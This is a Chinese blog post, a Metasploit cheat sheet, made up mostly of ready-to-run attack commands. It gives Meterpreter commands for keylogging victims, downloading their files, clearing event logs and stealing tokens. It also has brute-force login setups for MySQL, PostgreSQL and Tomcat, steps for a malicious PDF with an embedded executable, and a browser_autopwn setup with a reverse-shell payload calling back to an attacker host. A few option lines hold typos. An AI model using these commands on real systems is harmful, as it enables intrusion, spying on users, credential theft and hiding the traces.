• msf、armitage


    msfconsole的命令:
    msfconsole
    use module :这个命令允许你开始配置所选择的模块。
    set optionname module :这个命令允许你为指定的模块配置不同的选项。
    exploit :这个命令启动漏洞利用模块
    run :这个命令启动非漏洞利用模块。
    search module :这个命令允许你搜索独立模块。
    help
    exit


    msfcli的命令:
    msfcli
    msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
    msf -h


    Meterpreter 执行实际的载荷分发和漏洞利用工作:
    background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
    download :这个命令允许你从受害者机器中下载文件。
    upload :这个命令允许你向受害者机器上传文件。
    execute :这个命令允许你在受害者机器上运行命令。
    shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
    session -i :这个命令允许你在会话之间切换。


    开始记录目标系统中用户的击键顺序:
    keyscan_start

    转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
    keyscan_dump

    停止记录目标系统中用户的击键顺序。
    keyscan_stop

    删除目标系统中的文件。
    del exploited.docx

    清除目标系统中的事件日志。
    clearav

    展示运行进程的列表。
    ps

    杀掉受害者系统的指定进程,使用 kill [pid] 语法。
    kill 6353

    尝试偷取目标系统上的模拟令牌。
    steal_token


    msfconsole mysql
    use auxiliary/scanner/mysql/mysql_login
    show options
    set RHOST 192.168.10.111
    set user_file /root/Desktop/usernames.txt
    set pass_file /root/Desktop/passwords.txt
    exploit


    msfconsole postgresql
    use auxiliary/scanner/mysql/postgres_login
    show options
    set RHOST 192.168.10.111
    set user_file /root/Desktop/usernames.txt
    set pass_file /root/Desktop/passwords.txt
    exploit


    msfconsole tomcat
    use auxiliary/scanner/http/tomcat_mgr_login
    show options
    PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
    USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
    set RHOSTS 192.168.10.111
    set RPORT 8180
    exploit


    msfconsole
    msfconsole pdf
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    show options
    set FILENAME evildocument.pdf
    set INFILENAME /root/Desktop/willie.pdf
    exploit


    实现 browser_autopwn:
    浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
    们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
    利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
    msfconsole autopwn
    use auxiliary/server/browser_autopwn
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.10.109
    set URIPATH "filetypes"
    exploit
    Metasploit 会在 IP 地址 <http://[Provided IP Address]:8080> 处执行漏洞利用。
    当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
    如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
    session –I 1

    ...............................................................认真写每篇博客,如同我对待生活............................................................
  • 相关阅读:
    JavaScript根据CSS的Media Queries来判断浏览设备的方法
    JavaScript API 设计原则
    高性能 CSS3 动画
    CSS代码实例:用CSS代码写出的各种形状图形
    frontpage 2010.2003绿色版
    Web前端年后跳槽必看的各种面试题
    [ksm][数学] Jzoj P5810 简单的玄学
    [分治] Jzoj P5807 简单的区间
    [dfs][bfs] Jzoj P5806 简单的操作
    [dp] Jzoj P5804 简单的序列
  • 原文地址:https://www.cnblogs.com/itholidaycn/p/6393910.html
Copyright © 2020-2023  润新知